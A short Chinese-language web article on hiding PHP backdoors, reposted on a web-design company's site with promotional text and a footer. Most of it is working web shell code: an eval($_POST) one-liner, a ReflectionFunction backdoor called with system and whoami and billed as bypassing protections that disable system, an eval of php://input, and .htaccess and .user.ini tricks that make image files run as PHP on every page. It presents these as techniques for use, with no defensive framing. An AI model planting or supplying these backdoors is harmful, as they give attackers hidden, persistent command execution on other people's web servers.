php后门隐藏技巧

一句话 and 大马

 phpspy  菜刀一句话<?php@eval($_POST['cmd']);?>

成都创新互联公司专业成都网站设计、成都做网站、外贸网站建设，集网站策划、网站设计、网站制作于一体，网站seo、网站优化、网站营销、软文营销等专业人才根据搜索规律编程设计，让网站在运行后，在搜索中有好的表现，专业设计制作为您带来效益的网站！让网站建设为您创造效益。

反射后门

<?php

   $func = new ReflectionFunction($_GET[m]);

   echo $func->invokeArgs(array($_GET[c]));

?>

调用如x.php?m=system&c=whoami
后门也可绕过某些检测禁用system函数的防护系统

php:input

php://input是用来接收post数据（这里有php://input的介绍）

<?php

@eval(file_get_contents('php://input'))

?>

 

Post提交 system('whoami');

.htaccess(需webserver支持)

可以设置任意后缀也可以设置UTF7编码格式shell

AddType  application/x-httpd-php     .jpg

然后再传一个JPG结尾的shell，访问即可执行了

.user.ini(需fastcgi配合)

 动态修改php.ini配置文件

User.ini

auto_prepend_file:指定在每个PHP页面执行前所要执行的代码

auto_prepend_file=demo.gif (每个页面都会加载demo.gif)

使用php://input （不需要上传额外的文件）(需要自行打开allow_url_include=on 默认为off)

缺点:不支持.user.ini修改allow_url_include (在PHP5时是PHP_INI_SYSTEM。 从PHP5.2.0起可用。)

http://php.net/manual/zh/ini.list.php

http://php.net/manual/zh/configuration.changes.modes.php

文章题目：php后门隐藏技巧
网站地址：https://www.cdcxhl.com/article42/pgjdhc.html

成都网站建设公司_创新互联，为您提供关键词优化、企业建站、ChatGPT、营销型网站建设、小程序开发、企业网站制作

广告

声明：本网站发布的内容（图片、视频和文字）以用户投稿、用户转载内容为主，如果涉及侵权请尽快告知，我们将会在第一时间删除。文章观点不代表本网站立场，如需处理请联系客服。电话：028-86922220；邮箱：631063699@qq.com。内容未经允许不得转载，或转载时需注明来源： 创新互联